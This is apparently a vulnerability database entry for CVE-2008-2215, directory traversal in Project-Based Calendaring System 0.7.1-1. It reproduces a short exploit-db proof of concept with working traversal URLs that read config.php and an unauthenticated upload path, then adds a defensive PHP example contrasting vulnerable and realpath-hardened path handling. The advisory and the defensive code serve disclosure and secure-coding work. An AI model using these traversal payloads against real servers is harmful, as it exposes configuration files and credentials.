Project-Based Calendaring System Multiple Directory Traversal Vulnerabilities

Vulnerability ID: 1115098
Vulnerability type: Path traversal
Published: 2008-04-30
Updated: 2008-09-05
CVE: CVE-2008-2215
CNNVD ID: CNNVD-200805-175
Platform: PHP
CVSS score: 5.0
|Source
https://www.exploit-db.com/exploits/5523
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200805-175
|Vulnerability details
Project-Based Calendaring System (PBCS) 0.7.1-1 contains multiple directory traversal vulnerabilities. A remote attacker can read arbitrary files by placing ".." sequences in the filename parameter sent to (1) src/yopy_sync.php and (2) system-logger/print_logs.php.
|Exploit
Project Based Calendaring System (PBCS) Version 0.7.1 Multiple Vulnerabilities
Script: http://www.pbcs.org/pbcs_download.php
PoC:
Hi str0ke, thanks for posting, but I want to add some vulns in this script
1- remote file upload
http://localhost/pbcs-0.7.1-1/src/yopy_upload.php
after upload you can get your file at
http://localhost/pbcs-0.7.1-1//tmp/uploads/name your file
2- remote file disclosure
http://localhost/pbcs-0.7.1-1/src/yopy_sync.php?download_file=0&filename=../config/config.php
3- file disclosure
/plugins/system-logger/print_logs.php?filename=../../config/config.php

# milw0rm.com [2008-04-30]
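The flaw above is a download handler that joins a user-controlled filename onto a base directory and serves whatever path results. The following PHP is an added example, not PBCS code: it shows that vulnerable pattern next to a check that confines the resolved path to the intended directory (function names and the temporary layout are constructed for the demonstration).

```php
<?php
// Added example, not code from PBCS. Shows the pattern behind the
// yopy_sync.php / print_logs.php bug and a check that confines the
// filename to the intended directory. Function names are hypothetical.

// Vulnerable pattern: the filename is joined onto the base directory with no
// validation, so "../config/config.php" escapes the uploads directory.
function vulnerable_path(string $base, string $filename): string
{
    return $base . '/' . $filename;
}

// Hardened: resolve the candidate with realpath() and require that it lies
// inside the resolved base directory. Returns null when the target is outside
// the base, does not exist, or is not a regular file.
function safe_download_path(string $base, string $filename): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false || strpos($filename, "\0") !== false) {
        return null;
    }
    $candidate = realpath($baseReal . DIRECTORY_SEPARATOR . $filename);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Compare with a trailing separator so "/srv/uploads2" does not pass as
    // being inside "/srv/uploads".
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    return strncmp($candidate, $prefix, strlen($prefix)) === 0 ? $candidate : null;
}

// Constructed sample layout in a temporary directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pbcs_demo_' . uniqid();
mkdir("$root/uploads", 0700, true);
mkdir("$root/config", 0700, true);
file_put_contents("$root/uploads/notes.txt", "ok\n");
file_put_contents("$root/config/config.php", "<?php \$db_pass = 'placeholder';\n");

foreach (['notes.txt', '../config/config.php', 'missing.txt'] as $name) {
    printf("%-22s vulnerable_exists=%s safe=%s\n", $name,
        var_export(is_file(vulnerable_path("$root/uploads", $name)), true),
        var_export(safe_download_path("$root/uploads", $name), true));
}

// Clean up the constructed files.
array_map('unlink', ["$root/uploads/notes.txt", "$root/config/config.php"]);
array_map('rmdir', ["$root/uploads", "$root/config", $root]);
```

The traversal input resolves to an existing file under the vulnerable join but is rejected by the realpath prefix check; a filename that does not exist is rejected by both.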
|References

XF: pbcs-filename-directory-traversal (42106) - http://xforce.iss.net/xforce/xfdb/42106
BID: 28991 - http://www.securityfocus.com/bid/28991
MILW0RM: 5523 - http://www.milw0rm.com/exploits/5523
SECUNIA: 30015 - http://secunia.com/advisories/30015